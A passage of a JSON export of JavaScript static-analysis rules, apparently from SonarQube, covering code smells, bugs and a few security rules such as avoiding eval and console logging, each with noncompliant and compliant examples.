<\/li>\n  <li> MISRA C++:2008, 6-4-2 - All if...else if constructs shall be terminated with an else clause. <\/li>\n  <li> MISRA C:2012, 15.7 - All if...else if constructs shall be terminated with an else statement <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/YgE\">CERT, MSC01-C.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/JoIyAQ\">CERT, MSC01-CPP.<\/a> - Strive for logical completeness <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/PQHRAw\">CERT, MSC57-J.<\/a> - Strive for logical completeness <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:EqEqEq","repo":"javascript","name":"\"===\" and \"!==\" should be used instead of \"==\" and \"!=\"","htmlDesc":"<p>The <code>==<\/code> and <code>!=<\/code> operators do type coercion before comparing values. This is bad because it can mask type errors. For\nexample, it evaluates <code>' \\t\\r\\n' == 0<\/code> as <code>true<\/code>.<\/p>\n<p>It is best to always use the side-effect-less <code>===<\/code> and <code>!==<\/code> operators instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (var == 'howdy') {...} \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (var === 'howdy') {...}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Even if testing the equality of a variable against null doesn't do exactly what most JavaScript developers believe, usage of <code>==<\/code> or\n<code>!=<\/code> is tolerated in such context. In the following case, if <code>foo<\/code> hasn't been initialized, its default value is not\n<code>null<\/code> but <code>undefined<\/code>. 
Nevertheless <code>undefined == null<\/code>, so JavaScript developers get the expected behavior.<\/p>\n<pre>\nif(foo == null) {...}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:Eval","repo":"javascript","name":"Code should not be dynamically injected and executed","htmlDesc":"<p>The <code>eval<\/code> function is a way to run arbitrary code at run-time. Dynamically evaluating code is slow and a potential security issue when\nthe arguments haven't been properly validated.<\/p>\n<p>In general it is better to avoid it altogether, particularly when there are safer alternatives.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar value = eval('obj.' + propName); \/\/ Noncompliant\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar value = obj[propName];\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>This rule will not raise an issue when the argument of the <code>eval<\/code> call is a literal string as it is reasonably safe.<\/p>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/95.html\">MITRE CWE-95<\/a> - CWE-95: Improper Neutralization of Directives in Dynamically\n  Evaluated Code ('Eval Injection') <\/li>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A3-Cross-Site_Scripting_(XSS)\">OWASP Top Ten 2013 Category A3<\/a> - Cross-Site Scripting\n  (XSS) <\/li>\n<\/ul>","status":"READY","tags":["rank3"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:ExcessiveParameterList","repo":"javascript","name":"Functions should not have too many parameters","htmlDesc":"<p>A long parameter list can indicate that a new structure should be created to wrap the numerous parameters or that the function is doing too many\nthings.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With a maximum number of 4 parameters:<\/p>\n<pre>\nfunction doSomething(param1, param2, param3, param4, param5) {\n...\n}\n<\/pre>\n<h2>Compliant 
Solution<\/h2>\n<pre>\nfunction doSomething(param1, param2, param3, param4) {\n...\n}\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumFunctionParameters","htmlDesc":"The maximum authorized number of parameters","defaultValue":"7","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ForIn","repo":"javascript","name":"\"for...in\" loops should filter properties before acting on them","htmlDesc":"<p>The <code>for...in<\/code> statement allows you to loop through the names of all of the properties of an object. The list of properties includes all\nthose properties that were inherited through the prototype chain. This has the side effect of serving up functions when the interest is in data\nproperties. Programs that don't take this into account can fail.<\/p>\n<p>Therefore, the body of every <code>for...in<\/code> statement should be wrapped in an <code>if<\/code> statement that filters which properties are\nacted upon. It can select for a particular type or range of values, or it can exclude functions, or it can exclude properties from the prototype. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (name in object) {\n    doSomething(name);  \/\/ Noncompliant\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (name in object) {\n  if (object.hasOwnProperty(name)) {\n    doSomething(name);\n  }\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Loops used to clone objects are ignored.<\/p>\n<pre>\nfor (prop in obj) {\n  a[prop] = obj[prop];  \/\/ Compliant by exception\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FunctionComplexity","repo":"javascript","name":"Functions should not be too complex","htmlDesc":"<p>The Cyclomatic Complexity of functions should not exceed a defined threshold. 
Complex code may perform poorly and can be difficult to test\nthoroughly.<\/p>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[{"key":"maximumFunctionComplexityThreshold","htmlDesc":"The maximum authorized complexity in function","defaultValue":"10","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:FunctionDeclarationsWithinBlocks","repo":"javascript","name":"Function declarations should not be made within blocks","htmlDesc":"<p>While most script engines support function declarations within blocks, it is not part of ECMAScript 5 and below, and from browser to browser the\nimplementations are inconsistent with each other. ECMAScript 5 and below only allow function declarations in the root statement list of a script or\nfunction. If you are targeting browsers that don't support ECMAScript 6, use a variable initialized with a function expression to define a function\nwithin a block :<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (x) {\n  function foo() {}\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (x) {\n  var foo = function() {}\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:FutureReservedWords","repo":"javascript","name":"\"future reserved words\" should not be used as identifiers","htmlDesc":"<p>The following words may be used as keywords in future evolutions of the language, so using them as identifiers should be avoided to allow an easier\nadoption of those potential future versions:<\/p>\n<ul>\n  <li> <code>await<\/code> <\/li>\n  <li> <code>class<\/code> <\/li>\n  <li> <code>const<\/code> <\/li>\n  <li> <code>enum<\/code> <\/li>\n  <li> <code>export<\/code> <\/li>\n  <li> <code>extends<\/code> <\/li>\n  <li> <code>implements<\/code> <\/li>\n  <li> <code>import<\/code> <\/li>\n  <li> <code>interface<\/code> <\/li>\n  <li> <code>let<\/code> <\/li>\n  <li> <code>package<\/code> <\/li>\n  <li> <code>private<\/code> <\/li>\n  <li> 
<code>protected<\/code> <\/li>\n  <li> <code>public<\/code> <\/li>\n  <li> <code>static<\/code> <\/li>\n  <li> <code>super<\/code> <\/li>\n  <li> <code>yield<\/code> <\/li>\n<\/ul>\n<p>Use of these words as identifiers would produce an error in JavaScript <code>strict<\/code> mode code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar package = document.getElementsByName(\"foo\"); \/\/ Noncompliant\nvar someData = { package: true };                 \/\/ Compliant, as it is not used as an identifier here\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar elements = document.getElementsByName(\"foo\"); \/\/ Compliant\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:LabelPlacement","repo":"javascript","name":"Only \"while\", \"do\" and \"for\" statements should be labelled","htmlDesc":"<p>Any statement or block of statements can be identified by a label, but those labels should be used only on <code>while<\/code>,\n<code>do-while<\/code> and <code>for<\/code> statements. Using labels in any other context leads to unstructured, confusing code. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nmyLabel:if (i % 2 == 0) {  \/\/ Noncompliant\n  if (i == 12) {\n    print(\"12\");\n    break myLabel;\n  }\n  print(\"Odd number, but not 12\");\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nmyLabel:for (i = 0; i &lt; 10; i++) {   \/\/ Compliant\n  print(\"Loop\");\n  break myLabel;\n}\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:NestedIfDepth","repo":"javascript","name":"Control flow statements \"if\", \"for\", \"while\", \"switch\" and \"try\" should not be nested too deeply","htmlDesc":"<p>Nested <code>if<\/code>, <code>for<\/code>, <code>while<\/code>, <code>switch<\/code>, and <code>try<\/code> statements is a key ingredient for making\nwhat's known as \"Spaghetti code\".<\/p>\n<p>Such code is hard to read, refactor and therefore maintain.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<p>With the default threshold of 3:<\/p>\n<pre>\n  if (condition1) {                  \/\/ Compliant - depth = 1\n    \/* ... *\/\n    if (condition2) {                \/\/ Compliant - depth = 2\n      \/* ... *\/\n      for(int i = 0; i &lt; 10; i++) {  \/\/ Compliant - depth = 3, not exceeding the limit\n        \/* ... *\/\n        if (condition4) {            \/\/ Non-Compliant - depth = 4\n          if (condition5) {          \/\/ Depth = 5, exceeding the limit, but issues are only reported on depth = 4\n            \/* ... *\/\n          }\n          return;\n        }\n      }\n    }\n  }\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"maximumNestingLevel","htmlDesc":"Maximum allowed &quot;if\/for\/while\/switch\/try&quot; statements nesting depth","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:ParsingError","repo":"javascript","name":"JavaScript parser failure","htmlDesc":"<p>When the JavaScript parser fails, it is possible to record the failure as a violation on the file. 
This way, not only it is possible to track the\nnumber of files that do not parse but also to easily find out why they do not parse.<\/p>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:PrimitiveWrappers","repo":"javascript","name":"Wrapper objects should not be used for primitive types","htmlDesc":"<p>The use of wrapper objects for primitive types is gratuitous, confusing and dangerous. If you use a wrapper object constructor for type conversion,\njust remove the <code>new<\/code> keyword, and you'll get a primitive value automatically. If you use a wrapper object as a way to add properties to a\nprimitive, you should re-think the design. Such uses are considered bad practice, and should be refactored.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nlet x = new Number(\"0\");\nif (x) {\n  alert('hi');  \/\/ Shows 'hi'.\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nlet x = Number(\"0\");\nif (x) {\n  alert('hi');\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Cases when argument of primitive type constructor is a literal of the same type are ignored, except <code>new Boolean(false)<\/code>.<\/p>\n<pre>\nlet booleanObject = new Boolean(true);\nlet numberObject = new Number(0);\nlet stringObject = new String('');\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1067","repo":"javascript","name":"Expressions should not be too complex","htmlDesc":"<p>The complexity of an expression is defined by the number of <code>&amp;&amp;<\/code>, <code>||<\/code> and <code>condition ? 
ifTrue : ifFalse<\/code>\noperators it contains.<\/p>\n<p>A single expression's complexity should not become too high to keep the code readable.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum number of allowed conditional operators in an expression","defaultValue":"3","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1105","repo":"javascript","name":"An open curly brace should be located at the end of a line","htmlDesc":"<p>Sharing some coding conventions is a key point to make it possible for a team to efficiently collaborate. This rule makes it mandatory to place\nopen curly braces at the end of lines of code.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (condition)\n{                                                      \/\/Noncompliant\n  doSomething();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (condition) {                                   \/\/Compliant\n  doSomething();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Object literals appearing as arguments can start on their own line.<\/p>\n<pre>\nfunctionWithObject(\n   {                                                 \/\/Compliant\n        g: \"someValue\"\n   }\n);\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1125","repo":"javascript","name":"Boolean literals should not be redundant","htmlDesc":"<p>Redundant Boolean literals should be removed from expressions to improve readability.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif (booleanVariable == true) { \/* ... *\/ }\nif (booleanVariable != true) { \/* ... *\/ }\nif (booleanVariable || false) { \/* ... *\/ }\ndoSomething(!false);\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (booleanVariable) { \/* ... *\/ }\nif (!booleanVariable) { \/* ... *\/ }\nif (booleanVariable) { \/* ... 
*\/ }\ndoSomething(true);\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>The use of literal booleans in comparisons which use identity operators (<code>===<\/code> and <code>!==<\/code>) are ignored.<\/p>\n\n<h2>Deprecated<\/h2>\n<p>This rule is deprecated, and will eventually be removed.<\/p>","status":"DEPRECATED","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1134","repo":"javascript","name":"Track uses of \"FIXME\" tags","htmlDesc":"<p><code>FIXME<\/code> tags are commonly used to mark places where a bug is suspected, but which the developer wants to deal with later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(numerator, denominator) {\n  return numerator \/ denominator;              \/\/ FIXME denominator value might be  0\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment <\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1135","repo":"javascript","name":"Track uses of \"TODO\" tags","htmlDesc":"<p><code>TODO<\/code> tags are commonly used to mark places where some more code is required, but which the developer wants to implement later.<\/p>\n<p>Sometimes the developer will not have the time or will simply forget to get back to that tag.<\/p>\n<p>This rule is meant to track those tags and to ensure that they do not go unnoticed.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething() {\n  \/\/ TODO\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/546.html\">MITRE, CWE-546<\/a> - Suspicious Comment 
<\/li>\n<\/ul>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1219","repo":"javascript","name":"\"switch\" statements should not contain non-case labels","htmlDesc":"<p>Even if it is legal, mixing case and non-case labels in the body of a switch statement is very confusing and can even be the result of a typing\nerror.<\/p>\n<h2>Noncompliant Code Examples<\/h2>\n<p>Case 1, the code is syntactically correct but the behavior is not the expected one<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  WEDNESDAY:   \/\/ instead of \"case WEDNESDAY\"\n    doSomething();\n    break;\n  ...\n}\n<\/pre>\n<p>Case 2, the code is correct and behaves as expected but is hardly readable <\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    foo:for(i = 0 ; i &lt; X ; i++) {\n         \/* ... *\/\n        break foo;  \/\/ this break statement doesn't relate to the nesting case TUESDAY\n         \/* ... *\/\n    }\n    break;\n    \/* ... *\/\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<p>Case 1<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n  case TUESDAY:\n  case WEDNESDAY:\n    doSomething();\n    break;\n  ...\n}\n<\/pre>\n<p>Case 2<\/p>\n<pre>\nswitch (day) {\n  case MONDAY:\n    break;\n  case TUESDAY:\n    compute(args); \/\/ put the content of the labelled \"for\" statement in a dedicated method\n    break;\n\n    \/* ... *\/\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.0 - The MISRA C <em>switch<\/em> syntax shall be used. <\/li>\n  <li> MISRA C++:2008, 6-4-3 - A switch statement shall be a well-formed switch statement. 
<\/li>\n  <li> MISRA C:2012, 16.1 - All switch statements shall be well-formed <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1264","repo":"javascript","name":"A \"while\" loop should be used instead of a \"for\" loop","htmlDesc":"<p>When only the condition expression is defined in a <code>for<\/code> loop, and the initialization and increment expressions are missing, a\n<code>while<\/code> loop should be used instead to increase readability. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (;condition;) { \/*...*\/ }\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nwhile (condition) { \/*...*\/ }\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1301","repo":"javascript","name":"\"switch\" statements should have at least 3 \"case\" clauses","htmlDesc":"<p><code>switch<\/code> statements are useful when there are many different cases depending on the value of the same expression.<\/p>\n<p>For just one or two cases however, the code will be more readable with <code>if<\/code> statements.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (variable) {\n  case 0:\n    doSomething();\n    break;\n  default:\n    doSomethingElse();\n    break;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nif (variable == 0) {\n  doSomething();\n} else {\n  doSomethingElse();\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> MISRA C:2004, 15.5 - Every switch statement shall have at least one case clause. <\/li>\n  <li> MISRA C++:2008, 6-4-8 - Every switch statement shall have at least one case-clause. 
<\/li>\n  <li> MISRA C:2012, 16.6 - Every switch statement shall have at least two switch-clauses <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S138","repo":"javascript","name":"Functions should not have too many lines","htmlDesc":"<p>A function that grows too large tends to aggregate too many responsibilities.<\/p>\n<p>Such functions inevitably become harder to understand and therefore harder to maintain. <\/p>\n<p>Above a specific threshold, it is strongly advised to refactor into smaller functions which focus on well-defined tasks.<\/p>\n<p>Those smaller functions will not only be easier to understand, but also probably easier to test.<\/p>\n<h2>Exceptions<\/h2>\n<p>This function ignores Immediately Invoked Function Expressions (IIFE), which are functions that are created and invoked without ever being assigned\na name.<\/p>\n<pre>\n(function () { \/\/ Ignored by this rule\n\n  function open() {  \/\/ Classic function declaration; not ignored\n    \/\/ ...\n  }\n\n  function read() {\n    \/\/ ...\n  }\n\n  function readlines() {\n    \/\/ ...\n  }\n})();\n<\/pre>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[{"key":"max","htmlDesc":"Maximum authorized lines in a function","defaultValue":"200","type":"INTEGER"}],"type":"CODE_SMELL"},{"key":"javascript:S1442","repo":"javascript","name":"\"alert(...)\" should not be used","htmlDesc":"<p><code>alert(...)<\/code> can be useful for debugging during development, but in production mode this kind of pop-up could expose sensitive\ninformation to attackers, and should never be displayed. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nif(unexpectedCondition)\n{\n  alert(\"Unexpected Condition\");\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"http:\/\/cwe.mitre.org\/data\/definitions\/489.html\">MITRE, CWE-489<\/a> - Leftover Debug Code <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S1656","repo":"javascript","name":"Variables should not be self-assigned","htmlDesc":"<p>There is no reason to re-assign a variable to itself. Either this statement is redundant and should be removed, or the re-assignment is a mistake\nand some other value or variable was intended for the assignment instead.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction setName(name) {\n    name = name;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction setName(name) {\n    this.name = name;\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/NYA5\">CERT, MSC12-C.<\/a> - Detect and remove code that has no effect or is never\n  executed <\/li>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/SIIyAQ\">CERT, MSC12-CPP.<\/a> - Detect and remove code that has no effect <\/li>\n<\/ul>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S1871","repo":"javascript","name":"Two branches in a conditional structure should not have exactly the same implementation","htmlDesc":"<p>Having two <code>cases<\/code> in a <code>switch<\/code> statement or two branches in an <code>if<\/code> chain with the same implementation is at\nbest duplicate code, and at worst a coding error. If the same logic is truly needed for both instances, then in an <code>if<\/code> chain they should\nbe combined, or for a <code>switch<\/code>, one should fall through to the other. 
<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:  \/\/ Noncompliant; duplicates case 1's implementation\n    doFirstThing();\n    doSomething();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThing();  \/\/ Noncompliant; duplicates first condition\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nswitch (i) {\n  case 1:\n  case 3:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  default:\n    doTheRest();\n}\n\nif ((a &gt;= 0 &amp;&amp; a &lt; 10) || (a &gt;= 20 &amp;&amp; a &lt; 50)) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<p>or <\/p>\n<pre>\nswitch (i) {\n  case 1:\n    doFirstThing();\n    doSomething();\n    break;\n  case 2:\n    doSomethingDifferent();\n    break;\n  case 3:\n    doFirstThing();\n    doThirdThing();\n    break;\n  default:\n    doTheRest();\n}\n\nif (a &gt;= 0 &amp;&amp; a &lt; 10) {\n  doFirstThing();\n  doTheThing();\n}\nelse if (a &gt;= 10 &amp;&amp; a &lt; 20) {\n  doTheOtherThing();\n}\nelse if (a &gt;= 20 &amp;&amp; a &lt; 50) {\n  doFirstThing();\n  doTheThirdThing();\n}\nelse {\n  doTheRest();\n}\n<\/pre>\n<h2>Exceptions<\/h2>\n<p>Blocks in an <code>if<\/code> chain that contain a single line of code are ignored, as are blocks in a <code>switch<\/code> statement that contain a\nsingle line of code with or without a following 
<code>break<\/code>.<\/p>","status":"READY","tags":["rank4"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S1994","repo":"javascript","name":"\"for\" loop increment clauses should modify the loops' counters","htmlDesc":"<p>It can be extremely confusing when a <code>for<\/code> loop's counter is incremented outside of its increment clause. In such cases, the increment\nshould be moved to the loop's increment clause if at all possible.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; j++) {  \/\/ Noncompliant\n  \/\/ ...\n  i++;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (i = 0; i &lt; 10; i++, j++) {\n  \/\/ ...\n}\n<\/pre>\n<p>Or<\/p>\n<pre>\nfor (i = 0; i &lt; 10; i++) {\n  \/\/ ...\n  j++;\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2123","repo":"javascript","name":"Values should not be uselessly incremented","htmlDesc":"<p>A value that is incremented or decremented and then not stored is at best wasted code and at worst a bug.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar i = 0;\ni = i++; \/\/ Noncompliant; i is still zero\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar i = 0;\ni++;\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2138","repo":"javascript","name":"\"undefined\" should not be assigned","htmlDesc":"<p><code>undefined<\/code> is the value you get for variables and properties which have not yet been created. Use the same value to reset an existing\nvariable and you lose the ability to distinguish between a variable that exists but has no value and a variable that does not yet exist. 
Instead,\n<code>null<\/code> should be used, allowing you to tell the difference between a property that has been reset and one that was never created.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = undefined;  \/\/ Noncompliant\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nvar myObject = {};\n\n\/\/ ...\nmyObject.fname = null;\n\/\/ ...\n\nif (myObject.lname == undefined) {\n  \/\/ property not yet created\n}\nif (myObject.fname == undefined) {\n  \/\/ no real way of knowing the true state of myObject.fname\n}\n<\/pre>","status":"READY","tags":["rank1"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2208","repo":"javascript","name":"Wildcard imports should not be used","htmlDesc":"<p>On the principle that clearer code is better code, you should explicitly <code>import<\/code> the things you want to use in a module. Using\n<code>import *<\/code> imports everything in the module, and runs the risk of confusing maintainers. Similarly, <code>export * from \"module\";<\/code>\nimports and then re-exports everything in the module, and runs the risk of confusing not just maintainers but also users of the module.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nimport * as Imported from \"aModule\";  \/\/ Noncompliant\n<\/pre>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"CODE_SMELL"},{"key":"javascript:S2228","repo":"javascript","name":"Console logging should not be used","htmlDesc":"<p>Debug statements are always useful during development. 
But include them in production code - particularly in code that runs client-side - and you\nrun the risk of inadvertently exposing sensitive information, slowing down the browser, or even erroring-out the site for some users.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nconsole.log(password_entered); \/\/ Noncompliant\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.owasp.org\/index.php\/Top_10_2013-A6-Sensitive_Data_Exposure\">OWASP Top Ten 2013 Category A6<\/a> - Sensitive Data Exposure\n  <\/li>\n<\/ul>","status":"READY","tags":["rank5"],"langName":"JavaScript","params":[],"type":"VULNERABILITY"},{"key":"javascript:S2234","repo":"javascript","name":"Parameters should be passed in the correct order","htmlDesc":"<p>When the names of arguments in a function call match the names of the function parameters, it contributes to clearer, more readable code. However,\nwhen the names match, but are passed in a different order than the function parameters, it indicates a mistake in the parameter order which will\nlikely lead to unexpected results.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(dividend, divisor);  \/\/ Noncompliant; operation succeeds, but result is unexpected\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction divide(divisor, dividend) {\n  return divisor\/dividend;\n}\n\nfunction doTheThing() {\n  var divisor = 15;\n  var dividend = 5;\n\n  var result = divide(divisor, dividend);\n  \/\/...\n}\n<\/pre>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2251","repo":"javascript","name":"A \"for\" loop update clause should move the counter in the right direction","htmlDesc":"<p>A <code>for<\/code> loop with a stop condition that can never be reached, such as one with a counter that moves in the wrong 
direction, will run\ninfinitely. While there are occasions when an infinite loop is intended, the convention is to construct such loops as <code>while<\/code> loops. More\ntypically, an infinite <code>for<\/code> loop is a bug. <\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i--) { \/\/ Noncompliant;\n  \/\/...\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfor (var i = 0; i &lt; strings.length; i++) {\n  \/\/...\n}\n<\/pre>\n<h2>See<\/h2>\n<ul>\n  <li> <a href=\"https:\/\/www.securecoding.cert.org\/confluence\/x\/zYEzAg\">CERT, MSC54-J.<\/a> - Avoid inadvertent wrapping of loop counters <\/li>\n<\/ul>","status":"READY","tags":["rank2"],"langName":"JavaScript","params":[],"type":"BUG"},{"key":"javascript:S2392","repo":"javascript","name":"Variables should be defined in the blocks where they are used","htmlDesc":"<p>A variable that is declared at function scope, but only used inside a single block should be declared in that block, and variables that are\ndeclared inside a block but used outside of it (which is possible with a <code>var<\/code>-style declaration) should be declared outside the block.<\/p>\n<h2>Noncompliant Code Example<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var i;  \/\/ Noncompliant; should be declared in if-block\n  if (a &gt; b) {\n    i = a;\n    console.log(i);\n    var x = a - b;  \/\/ Noncompliant; should be declared outside if-block\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return a+b;\n}\n<\/pre>\n<h2>Compliant Solution<\/h2>\n<pre>\nfunction doSomething(a, b) {\n  var x = a - b;\n\n  if (a &gt; b) {\n    var i = a;\n    console.log(i);\n  }\n\n  if (a &gt; 4) {\n   console.log(x);\n  }\n\n  return 